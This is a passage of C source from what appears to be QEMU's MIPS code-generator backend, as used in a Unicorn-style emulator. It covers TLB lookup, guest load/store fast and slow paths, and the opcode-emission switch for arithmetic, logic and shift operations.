} tcg_out_opc_imm(s, OPC_ANDI, tmp, arg, 0xff); return tcg_out_call_iarg_reg(s, i, tmp); } static int tcg_out_call_iarg_reg16(TCGContext *s, int i, TCGReg arg) { TCGReg tmp = TCG_TMP0; if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { tmp = tcg_target_call_iarg_regs[i]; } tcg_out_opc_imm(s, OPC_ANDI, tmp, arg, 0xffff); return tcg_out_call_iarg_reg(s, i, tmp); } static int tcg_out_call_iarg_imm(TCGContext *s, int i, TCGArg arg) { TCGReg tmp = TCG_TMP0; if (arg == 0) { tmp = TCG_REG_ZERO; } else { if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { tmp = tcg_target_call_iarg_regs[i]; } tcg_out_movi(s, TCG_TYPE_REG, tmp, arg); } return tcg_out_call_iarg_reg(s, i, tmp); } static int tcg_out_call_iarg_reg2(TCGContext *s, int i, TCGReg al, TCGReg ah) { tcg_debug_assert(TCG_TARGET_REG_BITS == 32); i = (i + 1) & ~1; i = tcg_out_call_iarg_reg(s, i, (MIPS_BE ? ah : al)); i = tcg_out_call_iarg_reg(s, i, (MIPS_BE ? al : ah)); return i; } /* We expect to use a 16-bit negative offset from ENV. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -32768); /* * Perform the tlb comparison operation. * The complete host address is placed in BASE. * Clobbers TMP0, TMP1, TMP2, TMP3. 
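 *
 * Roughly, the fast path emitted below corresponds to this C sketch
 * ("fast", "align_mask" and "host" are illustrative names; the struct
 * fields are the real CPUTLBDescFast/CPUTLBEntry members used below):
 *
 *   uintptr_t off = (addr >> (TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS))
 *                   & fast->mask;                 // byte offset into the table
 *   CPUTLBEntry *ent = (void *)((uintptr_t)fast->table + off);
 *   if ((addr & (TARGET_PAGE_MASK | align_mask)) != ent->addr_read)
 *       goto slow_path;                           // the BNE(s) patched later
 *   host = ent->addend + addr;                    // final ALIAS_PADD into BASE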
*/ static void tcg_out_tlb_load(TCGContext *s, TCGReg base, TCGReg addrl, TCGReg addrh, TCGMemOpIdx oi, tcg_insn_unit *label_ptr[2], bool is_load) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif MemOp opc = get_memop(oi); unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); int mem_index = get_mmuidx(oi); int fast_off = TLB_MASK_TABLE_OFS(mem_index); int mask_off = fast_off + offsetof(CPUTLBDescFast, mask); int table_off = fast_off + offsetof(CPUTLBDescFast, table); int add_off = offsetof(CPUTLBEntry, addend); int cmp_off = (is_load ? offsetof(CPUTLBEntry, addr_read) : offsetof(CPUTLBEntry, addr_write)); target_ulong mask; /* Load tlb_mask[mmu_idx] and tlb_table[mmu_idx]. */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP0, TCG_AREG0, mask_off); tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP1, TCG_AREG0, table_off); /* Extract the TLB index from the address into TMP3. */ tcg_out_opc_sa(s, ALIAS_TSRL, TCG_TMP3, addrl, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); tcg_out_opc_reg(s, OPC_AND, TCG_TMP3, TCG_TMP3, TCG_TMP0); /* Add the tlb_table pointer, creating the CPUTLBEntry address in TMP3. */ tcg_out_opc_reg(s, ALIAS_PADD, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* We don't currently support unaligned accesses. We could do so with mips32r6. */ if (a_bits < s_bits) { a_bits = s_bits; } /* Mask the page bits, keeping the alignment bits to compare against. */ mask = (target_ulong)TARGET_PAGE_MASK | ((1 << a_bits) - 1); /* Load the (low-half) tlb comparator. */ if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { tcg_out_ld(s, TCG_TYPE_I32, TCG_TMP0, TCG_TMP3, cmp_off + LO_OFF); tcg_out_movi(s, TCG_TYPE_I32, TCG_TMP1, mask); } else { tcg_out_ldst(s, (TARGET_LONG_BITS == 64 ? OPC_LD : TCG_TARGET_REG_BITS == 64 ? OPC_LWU : OPC_LW), TCG_TMP0, TCG_TMP3, cmp_off); tcg_out_movi(s, TCG_TYPE_TL, TCG_TMP1, mask); /* No second compare is required here; load the tlb addend for the fast path. */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP2, TCG_TMP3, add_off); } tcg_out_opc_reg(s, OPC_AND, TCG_TMP1, TCG_TMP1, addrl); /* Zero extend a 32-bit guest address for a 64-bit host. */ if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, base, addrl); addrl = base; } label_ptr[0] = s->code_ptr; tcg_out_opc_br(s, OPC_BNE, TCG_TMP1, TCG_TMP0); /* Load and test the high half tlb comparator. */ if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { /* delay slot */ tcg_out_ld(s, TCG_TYPE_I32, TCG_TMP0, TCG_TMP3, cmp_off + HI_OFF); /* Load the tlb addend for the fast path. 
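
   Each BNE recorded in label_ptr[] is later retargeted at the common
   slow path, as in tcg_out_qemu_ld_slow_path() below:

     reloc_pc16(l->label_ptr[0], s->code_ptr);
     if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) {
         reloc_pc16(l->label_ptr[1], s->code_ptr);
     }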
*/ tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP2, TCG_TMP3, add_off); label_ptr[1] = s->code_ptr; tcg_out_opc_br(s, OPC_BNE, addrh, TCG_TMP0); } /* delay slot */ tcg_out_opc_reg(s, ALIAS_PADD, base, TCG_TMP2, addrl); } static void add_qemu_ldst_label(TCGContext *s, int is_ld, TCGMemOpIdx oi, TCGType ext, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addrhi, void *raddr, tcg_insn_unit *label_ptr[2]) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->type = ext; label->datalo_reg = datalo; label->datahi_reg = datahi; label->addrlo_reg = addrlo; label->addrhi_reg = addrhi; label->raddr = raddr; label->label_ptr[0] = label_ptr[0]; if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { label->label_ptr[1] = label_ptr[1]; } } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l) { TCGMemOpIdx oi = l->oi; MemOp opc = get_memop(oi); TCGReg v0; int i; /* resolve label address */ reloc_pc16(l->label_ptr[0], s->code_ptr); if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { reloc_pc16(l->label_ptr[1], s->code_ptr); } i = 1; if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { i = tcg_out_call_iarg_reg2(s, i, l->addrlo_reg, l->addrhi_reg); } else { i = tcg_out_call_iarg_reg(s, i, l->addrlo_reg); } i = tcg_out_call_iarg_imm(s, i, oi); i = tcg_out_call_iarg_imm(s, i, (intptr_t)l->raddr); tcg_out_call_int(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SSIZE)], false); /* delay slot */ tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); v0 = l->datalo_reg; if (TCG_TARGET_REG_BITS == 32 && (opc & MO_SIZE) == MO_64) { /* We eliminated V0 from the possible output registers, so it cannot be clobbered here. So we must move V1 first. */ if (MIPS_BE) { tcg_out_mov(s, TCG_TYPE_I32, v0, TCG_REG_V1); v0 = l->datahi_reg; } else { tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_V1); } } tcg_out_opc_br(s, OPC_BEQ, TCG_REG_ZERO, TCG_REG_ZERO); reloc_pc16(s->code_ptr - 1, l->raddr); /* delay slot */ if (TCG_TARGET_REG_BITS == 64 && l->type == TCG_TYPE_I32) { /* we always sign-extend 32-bit loads */ tcg_out_opc_sa(s, OPC_SLL, v0, TCG_REG_V0, 0); } else { tcg_out_opc_reg(s, OPC_OR, v0, TCG_REG_V0, TCG_REG_ZERO); } return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l) { TCGMemOpIdx oi = l->oi; MemOp opc = get_memop(oi); MemOp s_bits = opc & MO_SIZE; int i; /* resolve label address */ reloc_pc16(l->label_ptr[0], s->code_ptr); if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { reloc_pc16(l->label_ptr[1], s->code_ptr); } i = 1; if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { i = tcg_out_call_iarg_reg2(s, i, l->addrlo_reg, l->addrhi_reg); } else { i = tcg_out_call_iarg_reg(s, i, l->addrlo_reg); } switch (s_bits) { case MO_8: i = tcg_out_call_iarg_reg8(s, i, l->datalo_reg); break; case MO_16: i = tcg_out_call_iarg_reg16(s, i, l->datalo_reg); break; case MO_32: i = tcg_out_call_iarg_reg(s, i, l->datalo_reg); break; case MO_64: if (TCG_TARGET_REG_BITS == 32) { i = tcg_out_call_iarg_reg2(s, i, l->datalo_reg, l->datahi_reg); } else { i = tcg_out_call_iarg_reg(s, i, l->datalo_reg); } break; default: tcg_abort(); } i = tcg_out_call_iarg_imm(s, i, oi); /* Tail call to the store helper. Thus force the return address computation to take place in the return address register. 
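
   Conceptually (sketch):

     RA = l->raddr;                               // the movi below
     helper(env, addr, data, oi, retaddr = RA);   // entered via J, not JAL
     // the helper's own "jr ra" then resumes translated code at l->raddr,
     // saving the branch-back that the load slow path needs.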
*/ tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_RA, (intptr_t)l->raddr); i = tcg_out_call_iarg_reg(s, i, TCG_REG_RA); tcg_out_call_int(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)], true); /* delay slot */ tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); return true; } #endif static void tcg_out_qemu_ld_direct(TCGContext *s, TCGReg lo, TCGReg hi, TCGReg base, MemOp opc, bool is_64) { switch (opc & (MO_SSIZE | MO_BSWAP)) { case MO_UB: tcg_out_opc_imm(s, OPC_LBU, lo, base, 0); break; case MO_SB: tcg_out_opc_imm(s, OPC_LB, lo, base, 0); break; case MO_UW | MO_BSWAP: tcg_out_opc_imm(s, OPC_LHU, TCG_TMP1, base, 0); tcg_out_bswap16(s, lo, TCG_TMP1); break; case MO_UW: tcg_out_opc_imm(s, OPC_LHU, lo, base, 0); break; case MO_SW | MO_BSWAP: tcg_out_opc_imm(s, OPC_LHU, TCG_TMP1, base, 0); tcg_out_bswap16s(s, lo, TCG_TMP1); break; case MO_SW: tcg_out_opc_imm(s, OPC_LH, lo, base, 0); break; case MO_UL | MO_BSWAP: if (TCG_TARGET_REG_BITS == 64 && is_64) { if (use_mips32r2_instructions) { tcg_out_opc_imm(s, OPC_LWU, lo, base, 0); tcg_out_bswap32u(s, lo, lo); } else { tcg_out_bswap_subr(s, bswap32u_addr); /* delay slot */ tcg_out_opc_imm(s, OPC_LWU, TCG_TMP0, base, 0); tcg_out_mov(s, TCG_TYPE_I64, lo, TCG_TMP3); } break; } /* FALLTHRU */ case MO_SL | MO_BSWAP: if (use_mips32r2_instructions) { tcg_out_opc_imm(s, OPC_LW, lo, base, 0); tcg_out_bswap32(s, lo, lo); } else { tcg_out_bswap_subr(s, bswap32_addr); /* delay slot */ tcg_out_opc_imm(s, OPC_LW, TCG_TMP0, base, 0); tcg_out_mov(s, TCG_TYPE_I32, lo, TCG_TMP3); } break; case MO_UL: if (TCG_TARGET_REG_BITS == 64 && is_64) { tcg_out_opc_imm(s, OPC_LWU, lo, base, 0); break; } /* FALLTHRU */ case MO_SL: tcg_out_opc_imm(s, OPC_LW, lo, base, 0); break; case MO_Q | MO_BSWAP: if (TCG_TARGET_REG_BITS == 64) { if (use_mips32r2_instructions) { tcg_out_opc_imm(s, OPC_LD, lo, base, 0); tcg_out_bswap64(s, lo, lo); } else { tcg_out_bswap_subr(s, bswap64_addr); /* delay slot */ tcg_out_opc_imm(s, OPC_LD, TCG_TMP0, base, 0); tcg_out_mov(s, TCG_TYPE_I64, lo, TCG_TMP3); } } else if (use_mips32r2_instructions) { tcg_out_opc_imm(s, OPC_LW, TCG_TMP0, base, 0); tcg_out_opc_imm(s, OPC_LW, TCG_TMP1, base, 4); tcg_out_opc_reg(s, OPC_WSBH, TCG_TMP0, 0, TCG_TMP0); tcg_out_opc_reg(s, OPC_WSBH, TCG_TMP1, 0, TCG_TMP1); tcg_out_opc_sa(s, OPC_ROTR, MIPS_BE ? lo : hi, TCG_TMP0, 16); tcg_out_opc_sa(s, OPC_ROTR, MIPS_BE ? hi : lo, TCG_TMP1, 16); } else { tcg_out_bswap_subr(s, bswap32_addr); /* delay slot */ tcg_out_opc_imm(s, OPC_LW, TCG_TMP0, base, 0); tcg_out_opc_imm(s, OPC_LW, TCG_TMP0, base, 4); tcg_out_bswap_subr(s, bswap32_addr); /* delay slot */ tcg_out_mov(s, TCG_TYPE_I32, MIPS_BE ? lo : hi, TCG_TMP3); tcg_out_mov(s, TCG_TYPE_I32, MIPS_BE ? hi : lo, TCG_TMP3); } break; case MO_Q: /* Prefer to load from offset 0 first, but allow for overlap. */ if (TCG_TARGET_REG_BITS == 64) { tcg_out_opc_imm(s, OPC_LD, lo, base, 0); } else if (MIPS_BE ? hi != base : lo == base) { tcg_out_opc_imm(s, OPC_LW, hi, base, HI_OFF); tcg_out_opc_imm(s, OPC_LW, lo, base, LO_OFF); } else { tcg_out_opc_imm(s, OPC_LW, lo, base, LO_OFF); tcg_out_opc_imm(s, OPC_LW, hi, base, HI_OFF); } break; default: tcg_abort(); } } static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg addr_regl, addr_regh __attribute__((unused)); TCGReg data_regl, data_regh; TCGMemOpIdx oi; MemOp opc; #if defined(CONFIG_SOFTMMU) tcg_insn_unit *label_ptr[2]; #endif TCGReg base = TCG_REG_A0; data_regl = *args++; data_regh = (TCG_TARGET_REG_BITS == 32 && is_64 ? 
*args++ : 0); addr_regl = *args++; addr_regh = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); #if defined(CONFIG_SOFTMMU) tcg_out_tlb_load(s, base, addr_regl, addr_regh, oi, label_ptr, 1); tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc, is_64); add_qemu_ldst_label(s, 1, oi, (is_64 ? TCG_TYPE_I64 : TCG_TYPE_I32), data_regl, data_regh, addr_regl, addr_regh, s->code_ptr, label_ptr); #else if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, base, addr_regl); addr_regl = base; } if (guest_base == 0 && data_regl != addr_regl) { base = addr_regl; } else if (guest_base == (int16_t)guest_base) { tcg_out_opc_imm(s, ALIAS_PADDI, base, addr_regl, guest_base); } else { tcg_out_opc_reg(s, ALIAS_PADD, base, TCG_GUEST_BASE_REG, addr_regl); } tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc, is_64); #endif } static void tcg_out_qemu_st_direct(TCGContext *s, TCGReg lo, TCGReg hi, TCGReg base, MemOp opc) { /* Don't clutter the code below with checks to avoid bswapping ZERO. */ if ((lo | hi) == 0) { opc &= ~MO_BSWAP; } switch (opc & (MO_SIZE | MO_BSWAP)) { case MO_8: tcg_out_opc_imm(s, OPC_SB, lo, base, 0); break; case MO_16 | MO_BSWAP: tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, lo, 0xffff); tcg_out_bswap16(s, TCG_TMP1, TCG_TMP1); lo = TCG_TMP1; /* FALLTHRU */ case MO_16: tcg_out_opc_imm(s, OPC_SH, lo, base, 0); break; case MO_32 | MO_BSWAP: tcg_out_bswap32(s, TCG_TMP3, lo); lo = TCG_TMP3; /* FALLTHRU */ case MO_32: tcg_out_opc_imm(s, OPC_SW, lo, base, 0); break; case MO_64 | MO_BSWAP: if (TCG_TARGET_REG_BITS == 64) { tcg_out_bswap64(s, TCG_TMP3, lo); tcg_out_opc_imm(s, OPC_SD, TCG_TMP3, base, 0); } else if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_WSBH, TCG_TMP0, 0, MIPS_BE ? lo : hi); tcg_out_opc_reg(s, OPC_WSBH, TCG_TMP1, 0, MIPS_BE ? hi : lo); tcg_out_opc_sa(s, OPC_ROTR, TCG_TMP0, TCG_TMP0, 16); tcg_out_opc_sa(s, OPC_ROTR, TCG_TMP1, TCG_TMP1, 16); tcg_out_opc_imm(s, OPC_SW, TCG_TMP0, base, 0); tcg_out_opc_imm(s, OPC_SW, TCG_TMP1, base, 4); } else { tcg_out_bswap32(s, TCG_TMP3, MIPS_BE ? lo : hi); tcg_out_opc_imm(s, OPC_SW, TCG_TMP3, base, 0); tcg_out_bswap32(s, TCG_TMP3, MIPS_BE ? hi : lo); tcg_out_opc_imm(s, OPC_SW, TCG_TMP3, base, 4); } break; case MO_64: if (TCG_TARGET_REG_BITS == 64) { tcg_out_opc_imm(s, OPC_SD, lo, base, 0); } else { tcg_out_opc_imm(s, OPC_SW, MIPS_BE ? hi : lo, base, 0); tcg_out_opc_imm(s, OPC_SW, MIPS_BE ? lo : hi, base, 4); } break; default: tcg_abort(); } } static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg addr_regl, addr_regh __attribute__((unused)); TCGReg data_regl, data_regh; TCGMemOpIdx oi; MemOp opc; #if defined(CONFIG_SOFTMMU) tcg_insn_unit *label_ptr[2]; #endif TCGReg base = TCG_REG_A0; data_regl = *args++; data_regh = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addr_regl = *args++; addr_regh = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); #if defined(CONFIG_SOFTMMU) tcg_out_tlb_load(s, base, addr_regl, addr_regh, oi, label_ptr, 0); tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); add_qemu_ldst_label(s, 0, oi, (is_64 ? 
TCG_TYPE_I64 : TCG_TYPE_I32), data_regl, data_regh, addr_regl, addr_regh, s->code_ptr, label_ptr); #else base = TCG_REG_A0; if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, base, addr_regl); addr_regl = base; } if (guest_base == 0) { base = addr_regl; } else if (guest_base == (int16_t)guest_base) { tcg_out_opc_imm(s, ALIAS_PADDI, base, addr_regl, guest_base); } else { tcg_out_opc_reg(s, ALIAS_PADD, base, TCG_GUEST_BASE_REG, addr_regl); } tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); #endif } static void tcg_out_mb(TCGContext *s, TCGArg a0) { static const MIPSInsn sync[] = { /* Note that SYNC_MB is a slightly weaker than SYNC 0, as the former is an ordering barrier and the latter is a completion barrier. */ [0 ... TCG_MO_ALL] = OPC_SYNC_MB, [TCG_MO_LD_LD] = OPC_SYNC_RMB, [TCG_MO_ST_ST] = OPC_SYNC_WMB, [TCG_MO_LD_ST] = OPC_SYNC_RELEASE, [TCG_MO_LD_ST | TCG_MO_ST_ST] = OPC_SYNC_RELEASE, [TCG_MO_LD_ST | TCG_MO_LD_LD] = OPC_SYNC_ACQUIRE, }; tcg_out32(s, sync[a0 & TCG_MO_ALL]); } static void tcg_out_clz(TCGContext *s, MIPSInsn opcv2, MIPSInsn opcv6, int width, TCGReg a0, TCGReg a1, TCGArg a2) { if (use_mips32r6_instructions) { if (a2 == width) { tcg_out_opc_reg(s, opcv6, a0, a1, 0); } else { tcg_out_opc_reg(s, opcv6, TCG_TMP0, a1, 0); tcg_out_movcond(s, TCG_COND_EQ, a0, a1, 0, a2, TCG_TMP0); } } else { if (a2 == width) { tcg_out_opc_reg(s, opcv2, a0, a1, a1); } else if (a0 == a2) { tcg_out_opc_reg(s, opcv2, TCG_TMP0, a1, a1); tcg_out_opc_reg(s, OPC_MOVN, a0, TCG_TMP0, a1); } else if (a0 != a1) { tcg_out_opc_reg(s, opcv2, a0, a1, a1); tcg_out_opc_reg(s, OPC_MOVZ, a0, a2, a1); } else { tcg_out_opc_reg(s, opcv2, TCG_TMP0, a1, a1); tcg_out_opc_reg(s, OPC_MOVZ, TCG_TMP0, a2, a1); tcg_out_mov(s, TCG_TYPE_REG, a0, TCG_TMP0); } } } static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { MIPSInsn i1, i2; TCGArg a0, a1, a2; int c2; a0 = args[0]; a1 = args[1]; a2 = args[2]; c2 = const_args[2]; switch (opc) { case INDEX_op_exit_tb: { TCGReg b0 = TCG_REG_ZERO; a0 = (intptr_t)a0; if (a0 & ~0xffff) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_V0, a0 & ~0xffff); b0 = TCG_REG_V0; } if (!tcg_out_opc_jmp(s, OPC_J, tb_ret_addr)) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, (uintptr_t)tb_ret_addr); tcg_out_opc_reg(s, OPC_JR, 0, TCG_TMP0, 0); } tcg_out_opc_imm(s, OPC_ORI, TCG_REG_V0, b0, a0 & 0xffff); } break; case INDEX_op_goto_tb: if (s->tb_jmp_insn_offset) { /* direct jump method */ s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); /* Avoid clobbering the address during retranslation. 
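
   The J opcode keeps whatever 26-bit target field was published before,
   so a half-patched insn is never executable; the real target is later
   installed atomically by tb_target_set_jmp_target() at the end of this
   file:

     atomic_set((uint32_t *)jmp_addr, deposit32(OPC_J, 0, 26, addr >> 2));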
*/ tcg_out32(s, OPC_J | (*(uint32_t *)s->code_ptr & 0x3ffffff)); } else { /* indirect jump method */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP0, TCG_REG_ZERO, (uintptr_t)(s->tb_jmp_target_addr + a0)); tcg_out_opc_reg(s, OPC_JR, 0, TCG_TMP0, 0); } tcg_out_nop(s); set_jmp_reset_offset(s, a0); break; case INDEX_op_goto_ptr: /* jmp to the given host address (could be epilogue) */ tcg_out_opc_reg(s, OPC_JR, 0, a0, 0); tcg_out_nop(s); break; case INDEX_op_br: tcg_out_brcond(s, TCG_COND_EQ, TCG_REG_ZERO, TCG_REG_ZERO, arg_label(a0)); break; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: i1 = OPC_LBU; goto do_ldst; case INDEX_op_ld8s_i32: case INDEX_op_ld8s_i64: i1 = OPC_LB; goto do_ldst; case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: i1 = OPC_LHU; goto do_ldst; case INDEX_op_ld16s_i32: case INDEX_op_ld16s_i64: i1 = OPC_LH; goto do_ldst; case INDEX_op_ld_i32: case INDEX_op_ld32s_i64: i1 = OPC_LW; goto do_ldst; case INDEX_op_ld32u_i64: i1 = OPC_LWU; goto do_ldst; case INDEX_op_ld_i64: i1 = OPC_LD; goto do_ldst; case INDEX_op_st8_i32: case INDEX_op_st8_i64: i1 = OPC_SB; goto do_ldst; case INDEX_op_st16_i32: case INDEX_op_st16_i64: i1 = OPC_SH; goto do_ldst; case INDEX_op_st_i32: case INDEX_op_st32_i64: i1 = OPC_SW; goto do_ldst; case INDEX_op_st_i64: i1 = OPC_SD; do_ldst: tcg_out_ldst(s, i1, a0, a1, a2); break; case INDEX_op_add_i32: i1 = OPC_ADDU, i2 = OPC_ADDIU; goto do_binary; case INDEX_op_add_i64: i1 = OPC_DADDU, i2 = OPC_DADDIU; goto do_binary; case INDEX_op_or_i32: case INDEX_op_or_i64: i1 = OPC_OR, i2 = OPC_ORI; goto do_binary; case INDEX_op_xor_i32: case INDEX_op_xor_i64: i1 = OPC_XOR, i2 = OPC_XORI; do_binary: if (c2) { tcg_out_opc_imm(s, i2, a0, a1, a2); break; } do_binaryv: tcg_out_opc_reg(s, i1, a0, a1, a2); break; case INDEX_op_sub_i32: i1 = OPC_SUBU, i2 = OPC_ADDIU; goto do_subtract; case INDEX_op_sub_i64: i1 = OPC_DSUBU, i2 = OPC_DADDIU; do_subtract: if (c2) { tcg_out_opc_imm(s, i2, a0, a1, -a2); break; } goto do_binaryv; case INDEX_op_and_i32: if (c2 && a2 != (uint16_t)a2) { int msb = ctz32(~a2) - 1; tcg_debug_assert(use_mips32r2_instructions); tcg_debug_assert(is_p2m1(a2)); tcg_out_opc_bf(s, OPC_EXT, a0, a1, msb, 0); break; } i1 = OPC_AND, i2 = OPC_ANDI; goto do_binary; case INDEX_op_and_i64: if (c2 && a2 != (uint16_t)a2) { int msb = ctz64(~a2) - 1; tcg_debug_assert(use_mips32r2_instructions); tcg_debug_assert(is_p2m1(a2)); tcg_out_opc_bf64(s, OPC_DEXT, OPC_DEXTM, OPC_DEXTU, a0, a1, msb, 0); break; } i1 = OPC_AND, i2 = OPC_ANDI; goto do_binary; case INDEX_op_nor_i32: case INDEX_op_nor_i64: i1 = OPC_NOR; goto do_binaryv; case INDEX_op_mul_i32: if (use_mips32_instructions) { tcg_out_opc_reg(s, OPC_MUL, a0, a1, a2); break; } i1 = OPC_MULT, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_mulsh_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_MUH, a0, a1, a2); break; } i1 = OPC_MULT, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_muluh_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_MUHU, a0, a1, a2); break; } i1 = OPC_MULTU, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_div_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DIV_R6, a0, a1, a2); break; } i1 = OPC_DIV, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_divu_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DIVU_R6, a0, a1, a2); break; } i1 = OPC_DIVU, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_rem_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_MOD, a0, a1, a2); break; } i1 = OPC_DIV, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_remu_i32: if (use_mips32r6_instructions) { 
tcg_out_opc_reg(s, OPC_MODU, a0, a1, a2); break; } i1 = OPC_DIVU, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_mul_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DMUL, a0, a1, a2); break; } i1 = OPC_DMULT, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_mulsh_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DMUH, a0, a1, a2); break; } i1 = OPC_DMULT, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_muluh_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DMUHU, a0, a1, a2); break; } i1 = OPC_DMULTU, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_div_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DDIV_R6, a0, a1, a2); break; } i1 = OPC_DDIV, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_divu_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DDIVU_R6, a0, a1, a2); break; } i1 = OPC_DDIVU, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_rem_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DMOD, a0, a1, a2); break; } i1 = OPC_DDIV, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_remu_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DMODU, a0, a1, a2); break; } i1 = OPC_DDIVU, i2 = OPC_MFHI; do_hilo1: tcg_out_opc_reg(s, i1, 0, a1, a2); tcg_out_opc_reg(s, i2, a0, 0, 0); break; case INDEX_op_muls2_i32: i1 = OPC_MULT; goto do_hilo2; case INDEX_op_mulu2_i32: i1 = OPC_MULTU; goto do_hilo2; case INDEX_op_muls2_i64: i1 = OPC_DMULT; goto do_hilo2; case INDEX_op_mulu2_i64: i1 = OPC_DMULTU; do_hilo2: tcg_out_opc_reg(s, i1, 0, a2, args[3]); tcg_out_opc_reg(s, OPC_MFLO, a0, 0, 0); tcg_out_opc_reg(s, OPC_MFHI, a1, 0, 0); break; case INDEX_op_not_i32: case INDEX_op_not_i64: i1 = OPC_NOR; goto do_unary; case INDEX_op_bswap16_i32: case INDEX_op_bswap16_i64: i1 = OPC_WSBH; goto do_unary; case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: i1 = OPC_SEB; goto do_unary; case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: i1 = OPC_SEH; do_unary: tcg_out_opc_reg(s, i1, a0, TCG_REG_ZERO, a1); break; case INDEX_op_bswap32_i32: tcg_out_bswap32(s, a0, a1); break; case INDEX_op_bswap32_i64: tcg_out_bswap32u(s, a0, a1); break; case INDEX_op_bswap64_i64: tcg_out_bswap64(s, a0, a1); break; case INDEX_op_extrh_i64_i32: tcg_out_dsra(s, a0, a1, 32); break; case INDEX_op_ext32s_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extrl_i64_i32: tcg_out_opc_sa(s, OPC_SLL, a0, a1, 0); break; case INDEX_op_ext32u_i64: case INDEX_op_extu_i32_i64: tcg_out_ext32u(s, a0, a1); break; case INDEX_op_sar_i32: i1 = OPC_SRAV, i2 = OPC_SRA; goto do_shift; case INDEX_op_shl_i32: i1 = OPC_SLLV, i2 = OPC_SLL; goto do_shift; case INDEX_op_shr_i32: i1 = OPC_SRLV, i2 = OPC_SRL; goto do_shift; case INDEX_op_rotr_i32: i1 = OPC_ROTRV, i2 = OPC_ROTR; do_shift: if (c2) { tcg_out_opc_sa(s, i2, a0, a1, a2); break; } do_shiftv: tcg_out_opc_reg(s, i1, a0, a2, a1); break; 